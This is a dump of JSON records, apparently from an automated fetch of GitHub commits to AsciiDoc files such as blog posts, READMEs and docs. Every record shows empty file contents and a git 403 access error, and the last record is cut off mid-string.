{"commit":"e4732f3c4d888cd19c6772e3df94720e87dadce2","subject":"Update 2016-12-07-Can-I-set-this-to-a-past-date.adoc","message":"Update 2016-12-07-Can-I-set-this-to-a-past-date.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2016-12-07-Can-I-set-this-to-a-past-date.adoc","new_file":"_posts\/2016-12-07-Can-I-set-this-to-a-past-date.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7e78f09a1d6e9255bc98d89da0ddd6b42936c0e0","subject":"update shield limitations around document level security","message":"update shield limitations around document level security\n\nOriginal commit: elastic\/x-pack-elasticsearch@4afbf69ce24b31ecd4f55148c17d28da7b57c86a\n","repos":"scorpionvicky\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,vroyer\/elassandra,nknize\/elasticsearch,gfyoung\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,vroyer\/elassandra,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,strapdata\/elassandra,robin13\/elasticsearch,vroyer\/elassandra,nknize\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,strapdata\/elassandra,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,strapdata\/elassandra,uschindler\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,strapdata\/elassandra,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,HonzaKral\/elasticsearch,coding0011\/elasticsearch,strapdata\/elassandra,robin13\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch","old_file":"shield\/docs\/public\/limitations.asciidoc","new_file":"shield\/docs\/public\/limitations.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3fe65a225e7adb57dea4c9384ff81d2ec0794bab","subject":"Update 2015-08-25-Hello-World.adoc","message":"Update 2015-08-25-Hello-World.adoc","repos":"harichen\/harichen.io,harichen\/harichen.io,harichen\/harichen.io","old_file":"_posts\/2015-08-25-Hello-World.adoc","new_file":"_posts\/2015-08-25-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/harichen\/harichen.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f26b875b30e8c683895b62cf8252f55eaf2e51fc","subject":"Update 2016-08-12-primer-post.adoc","message":"Update 2016-08-12-primer-post.adoc","repos":"roamarox\/roamarox.github.io,roamarox\/roamarox.github.io,roamarox\/roamarox.github.io,roamarox\/roamarox.github.io","old_file":"_posts\/2016-08-12-primer-post.adoc","new_file":"_posts\/2016-08-12-primer-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/roamarox\/roamarox.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cb1c75e46f2a1d5e088377f0ee6c49218ee93bd5","subject":"Update 2017-05-29-Hello-World.adoc","message":"Update 2017-05-29-Hello-World.adoc","repos":"PertuyF\/PertuyF.github.io,PertuyF\/PertuyF.github.io,PertuyF\/PertuyF.github.io,PertuyF\/PertuyF.github.io","old_file":"_posts\/2017-05-29-Hello-World.adoc","new_file":"_posts\/2017-05-29-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/PertuyF\/PertuyF.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4a3579bd3f3a5f9e092a9cebfd402e111d229ab6","subject":"removed IssueStats badges, service down [skip ci]","message":"removed IssueStats badges, service down [skip ci]","repos":"gencer\/WPN-XM,gencer\/WPN-XM,WPN-XM\/WPN-XM,gencer\/WPN-XM,gencer\/WPN-XM,WPN-XM\/WPN-XM,WPN-XM\/WPN-XM,WPN-XM\/WPN-XM,gencer\/WPN-XM,WPN-XM\/WPN-XM,gencer\/WPN-XM,WPN-XM\/WPN-XM","old_file":"readme.asciidoc","new_file":"readme.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/WPN-XM\/WPN-XM.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"797d56681373e508c68bc538cad61e687b48f106","subject":"add README","message":"add README\n\n\ngit-svn-id: 6e2e506005f11016269006bf59d22f905406eeba@1758244 13f79535-47bb-0310-9956-ffa450edef68\n","repos":"apache\/openwebbeans,apache\/openwebbeans,apache\/openwebbeans","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apache\/openwebbeans.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d50d424f9e79b221fdaa1a445b87f019b72ed606","subject":"[Readme] asciidoc readme","message":"[Readme] asciidoc readme\n\nFor the benifit of github.\n","repos":"kprovost\/libs7comm,kprovost\/libs7comm","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kprovost\/libs7comm.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"f4ed2bb0d41c3923d2729567c7082ce6de08b645","subject":"rename md to asciidoc","message":"rename md to asciidoc\n","repos":"bsorrentino\/forge-js-addon,bsorrentino\/forge-dynjs-addon,bsorrentino\/forge-js-addon,bsorrentino\/forge-dynjs-addon","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bsorrentino\/forge-dynjs-addon.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fe17d52178e016f83fb80ac2641111f9cf5bff93","subject":"Create scala_first_steps.adoc","message":"Create scala_first_steps.adoc","repos":"oreillyross\/developer-notes,oreillyross\/developer-notes,oreillyross\/developer-notes","old_file":"scala_first_steps.adoc","new_file":"scala_first_steps.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oreillyross\/developer-notes.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"a319aad26c5f2ea9c042517d5a5297976137631a","subject":"provide a first unpolished overview to mind","message":"provide a first unpolished overview to mind\n","repos":"frans-fuerst\/thinks,frans-fuerst\/thinks,frans-fuerst\/thinks","old_file":"content\/available\/2015-04-01-13-mind.asciidoc","new_file":"content\/available\/2015-04-01-13-mind.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/frans-fuerst\/thinks.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"690c668e560ca14f144eb25a8cacd8a744c8bccd","subject":"Update 2016-09-28-Episode-73-Marvel-at-Timelords.adoc","message":"Update 2016-09-28-Episode-73-Marvel-at-Timelords.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2016-09-28-Episode-73-Marvel-at-Timelords.adoc","new_file":"_posts\/2016-09-28-Episode-73-Marvel-at-Timelords.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f58467bf4ebba81fd3389c446a25e81ae021904c","subject":"Update 2017-05-31-Controll-Flow-Statements.adoc","message":"Update 2017-05-31-Controll-Flow-Statements.adoc","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2017-05-31-Controll-Flow-Statements.adoc","new_file":"_posts\/2017-05-31-Controll-Flow-Statements.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"86d671eaca12fb711f36c4d2b29203024c5552e6","subject":"How to set up.","message":"How to set up.\n","repos":"LearningTree\/TicketManorJava,LearningTree\/TicketManorJava,LearningTree\/TicketManorJava,LearningTree\/TicketManorJava","old_file":"SETUP.adoc","new_file":"SETUP.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LearningTree\/TicketManorJava.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0e6ddb6b8c8542b941be6edbcc4ab3ab2108468b","subject":"Deleted 2016-12-2-3-D.adoc","message":"Deleted 2016-12-2-3-D.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"2016-12-2-3-D.adoc","new_file":"2016-12-2-3-D.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bf2923bb6c161b1c9ca4afc1af8fc77a8814acc1","subject":"Delete the file at '_posts\/2017-03-14-First-Post.adoc'","message":"Delete the file at '_posts\/2017-03-14-First-Post.adoc'","repos":"kzmenet\/kzmenet.github.io,kzmenet\/kzmenet.github.io,kzmenet\/kzmenet.github.io,kzmenet\/kzmenet.github.io","old_file":"_posts\/2017-03-14-First-Post.adoc","new_file":"_posts\/2017-03-14-First-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kzmenet\/kzmenet.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"921b64bc5b90b01f0faf9eb6fc8bc48131ab03e0","subject":"Add doc","message":"Add doc\n","repos":"microserviceux\/muon-node,microserviceux\/muon-node","old_file":"doc\/index.adoc","new_file":"doc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/microserviceux\/muon-node.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b2beab2d8d320805c0eb167fd5d7cb331f96f0af","subject":"Update 2015-10-14-Un-troisieme-post.adoc","message":"Update 2015-10-14-Un-troisieme-post.adoc","repos":"codelab-lbernard\/blog,codelab-lbernard\/blog,codelab-lbernard\/blog","old_file":"_posts\/2015-10-14-Un-troisieme-post.adoc","new_file":"_posts\/2015-10-14-Un-troisieme-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/codelab-lbernard\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"70521ece4145a4235e2b0c77d3327b73bf6d8854","subject":"Update 2017-09-22-Post-Number-Three.adoc","message":"Update 2017-09-22-Post-Number-Three.adoc","repos":"koter84\/blog,koter84\/blog,koter84\/blog,koter84\/blog","old_file":"_posts\/2017-09-22-Post-Number-Three.adoc","new_file":"_posts\/2017-09-22-Post-Number-Three.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/koter84\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dbe02ab41db99b4a10da57e64d332822cee85a8a","subject":"Publish 10022015-Blog-Title.adoc","message":"Publish 10022015-Blog-Title.adoc","repos":"Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de","old_file":"10022015-Blog-Title.adoc","new_file":"10022015-Blog-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Bloggerschmidt\/bloggerschmidt.de.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3db302e064a66a08adab8e36fe26c00738ed1300","subject":"Update 2016-01-26-Core-Java-Reading.adoc","message":"Update 2016-01-26-Core-Java-Reading.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2016-01-26-Core-Java-Reading.adoc","new_file":"_posts\/2016-01-26-Core-Java-Reading.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"34f2775c7d35350a5d9f69049392e76eac2d421b","subject":"Update 2017-05-04-Netz-und-Netzwerk.adoc","message":"Update 2017-05-04-Netz-und-Netzwerk.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2017-05-04-Netz-und-Netzwerk.adoc","new_file":"_posts\/2017-05-04-Netz-und-Netzwerk.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9fbd8391c4204d208e49bef85d753e1624094dcc","subject":"y2b create post Amazon Kindle Fire HD Giveaway!","message":"y2b create post Amazon Kindle Fire HD Giveaway!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-09-19-Amazon-Kindle-Fire-HD-Giveaway.adoc","new_file":"_posts\/2012-09-19-Amazon-Kindle-Fire-HD-Giveaway.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ae636bf5405049c04b4901dc77983603647cbb5d","subject":"DBZ-993 Adjusting to changed log message format","message":"DBZ-993 Adjusting to changed log message format\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"docs\/connectors\/sqlserver.asciidoc","new_file":"docs\/connectors\/sqlserver.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cf4c6a0718f62e118ec598e27bb04f39f6e1a407","subject":"Create payment.adoc","message":"Create payment.adoc","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/subscription\/includes\/payment.adoc","new_file":"userguide\/subscription\/includes\/payment.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3136e0f13f372d0f2c3a0e0e8f99a27be0d6e4e2","subject":"y2b create post 3 Cool Gadgets Under $20","message":"y2b create post 3 Cool Gadgets Under $20","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-05-13-3-Cool-Gadgets-Under-20.adoc","new_file":"_posts\/2017-05-13-3-Cool-Gadgets-Under-20.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"24a5ea9dd3b937fa59b5b1d284551e7529f92815","subject":"Update 2017-07-05-Blogging-with-Hub-Press.adoc","message":"Update 2017-07-05-Blogging-with-Hub-Press.adoc","repos":"TsungmingLiu\/tsungmingliu.github.io,TsungmingLiu\/tsungmingliu.github.io,TsungmingLiu\/tsungmingliu.github.io,TsungmingLiu\/tsungmingliu.github.io","old_file":"_posts\/2017-07-05-Blogging-with-Hub-Press.adoc","new_file":"_posts\/2017-07-05-Blogging-with-Hub-Press.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TsungmingLiu\/tsungmingliu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4632631e004fd51fb4523ace88c3e58c8a090588","subject":"Update 2018-06-06-I-tried-to-use-J-S-Doc3.adoc","message":"Update 2018-06-06-I-tried-to-use-J-S-Doc3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-06-I-tried-to-use-J-S-Doc3.adoc","new_file":"_posts\/2018-06-06-I-tried-to-use-J-S-Doc3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f8b6428654433c61cefe6c792f6df66b87f8c02d","subject":"Initial documentation commit","message":"Initial documentation commit\n","repos":"storozhukBM\/requestlimit","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/storozhukBM\/requestlimit.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e118163988aecc511b93108f5999c6a9c3d539f4","subject":"Update 2015-05-07-Estructuras-de-Control-If-Else-Switch.adoc","message":"Update 2015-05-07-Estructuras-de-Control-If-Else-Switch.adoc","repos":"Wurser\/wurser.github.io,Wurser\/wurser.github.io,Wurser\/wurser.github.io","old_file":"_posts\/2015-05-07-Estructuras-de-Control-If-Else-Switch.adoc","new_file":"_posts\/2015-05-07-Estructuras-de-Control-If-Else-Switch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"error: RPC failed; HTTP 403 curl 22 The requested URL returned error: 403\nfatal: the remote end hung up unexpectedly\n","license":"mit","lang":"AsciiDoc"} {"commit":"06ede8dbc74bb8f863bb47b918bc69f700f8137d","subject":"essai avec asciidoc","message":"essai avec asciidoc\n","repos":"SambaEdu\/se3-docs","old_file":"essai.adoc","new_file":"essai.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SambaEdu\/se3-docs.git\/': The requested URL returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"841a48e88333462721771f2b97667d9446ac401b","subject":"test asciidoc","message":"test asciidoc\n","repos":"davidmoten\/rxjava2-jdbc,davidmoten\/rxjava2-jdbc,davidmoten\/rxjava2-jdbc","old_file":"TEST.adoc","new_file":"TEST.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/davidmoten\/rxjava2-jdbc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"030f1e3fa7dc6054f9dfe1ba153755318837f7f1","subject":"Revert \"unpublish story\"","message":"Revert \"unpublish story\"\n\nThis reverts commit b0a14c52e79fee28c1d6ca8af58f1144645ae222.\n","repos":"clojure\/clojure-site","old_file":"content\/stories\/uhn.adoc","new_file":"content\/stories\/uhn.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"539f4ff5b452fb8d866322eb5d742346b4b8cfe5","subject":"Update 2013-11-03-Por-que-Ruby.adoc","message":"Update 2013-11-03-Por-que-Ruby.adoc","repos":"arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io","old_file":"_posts\/2013-11-03-Por-que-Ruby.adoc","new_file":"_posts\/2013-11-03-Por-que-Ruby.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/arthurmolina\/arthurmolina.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1ef36058dab2f9b26cc4639e43d1352b894a2bbe","subject":"Update 2016-04-01-Ill-find-you.adoc","message":"Update 2016-04-01-Ill-find-you.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-01-Ill-find-you.adoc","new_file":"_posts\/2016-04-01-Ill-find-you.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e3a7691bd44ce9020456035433145cf6231f73c0","subject":"y2b create post Why SCUF?","message":"y2b create post Why SCUF?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-01-13-Why-SCUF.adoc","new_file":"_posts\/2015-01-13-Why-SCUF.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bfe41968474997c48abb37cd519d476466264f37","subject":"Update 2018-09-04-vr-comic.adoc","message":"Update 2018-09-04-vr-comic.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-04-vr-comic.adoc","new_file":"_posts\/2018-09-04-vr-comic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f9cd60ce383ce124a8b87944b3e688889dc8b0e3","subject":"Added nng_sockaddr man page.","message":"Added nng_sockaddr man page.\n","repos":"nanomsg\/nng,nanomsg\/nng,nanomsg\/nng,nanomsg\/nng","old_file":"docs\/man\/nng_sockaddr.adoc","new_file":"docs\/man\/nng_sockaddr.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nanomsg\/nng.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"86ac38a1b083811538eb47e9ec291f8ca72ce644","subject":"Update 2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","message":"Update 2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","repos":"simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io","old_file":"_posts\/2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","new_file":"_posts\/2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simevidas\/simevidas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8daf558c0826b76e88323faf261ffa2223faff08","subject":"Update 2016-01-04-Java-8-in-action.adoc","message":"Update 2016-01-04-Java-8-in-action.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2016-01-04-Java-8-in-action.adoc","new_file":"_posts\/2016-01-04-Java-8-in-action.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"09466ef24a8e51b25625213f54e5b68f71e67867","subject":"Formatting changes","message":"Formatting changes\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"week02.asciidoc","new_file":"week02.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"00fd9bdf44727e78d3e9190dfb589e5547bd5baa","subject":"Update dbm-gorm-diff.adoc","message":"Update dbm-gorm-diff.adoc","repos":"jako512\/grails-database-migration,sbglasius\/grails-database-migration","old_file":"src\/docs\/asciidoc\/ref\/Diff Scripts\/dbm-gorm-diff.adoc","new_file":"src\/docs\/asciidoc\/ref\/Diff Scripts\/dbm-gorm-diff.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jako512\/grails-database-migration.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a3250735ae789f47ea43608dc02d70ef2683b227","subject":"Update 2016-03-19-Bitcoin-comment-ca-marche.adoc","message":"Update 2016-03-19-Bitcoin-comment-ca-marche.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-19-Bitcoin-comment-ca-marche.adoc","new_file":"_posts\/2016-03-19-Bitcoin-comment-ca-marche.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a11b480c65b13f42ad27b8a10f75083acec6e365","subject":"formatting","message":"formatting\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"week02.asciidoc","new_file":"week02.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b2164435926df40ca1918a49c656325967611873","subject":"formatting","message":"formatting\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"week02.asciidoc","new_file":"week02.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b3b42ed9a9a971a238011fc9b5c03f5dd7086521","subject":"y2b create post It's Your Life... Or Is It?","message":"y2b create post It's Your Life... Or Is It?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-01-12-Its-Your-Life-Or-Is-It.adoc","new_file":"_posts\/2017-01-12-Its-Your-Life-Or-Is-It.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9b7fea8fe0b7f6780db393ec92cae4197d84be7a","subject":"CL lib: HTTP client lib","message":"CL lib: HTTP client lib\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"61074191b6e7632c2680016266b2f00ddc5b9fc7","subject":"Update 2017-11-29-Pour-tous-ceux-preparent-un-sujet-pour-le-CFP-de-Devoxx.adoc","message":"Update 2017-11-29-Pour-tous-ceux-preparent-un-sujet-pour-le-CFP-de-Devoxx.adoc","repos":"Ardemius\/ardemius.github.io,Ardemius\/ardemius.github.io,Ardemius\/ardemius.github.io","old_file":"_posts\/2017-11-29-Pour-tous-ceux-preparent-un-sujet-pour-le-CFP-de-Devoxx.adoc","new_file":"_posts\/2017-11-29-Pour-tous-ceux-preparent-un-sujet-pour-le-CFP-de-Devoxx.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ardemius\/ardemius.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3ebfef7baf8826d0528da9463fa09d315aea3e81","subject":"Update 2017-10-02-iterator.adoc","message":"Update 2017-10-02-iterator.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-02-iterator.adoc","new_file":"_posts\/2017-10-02-iterator.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 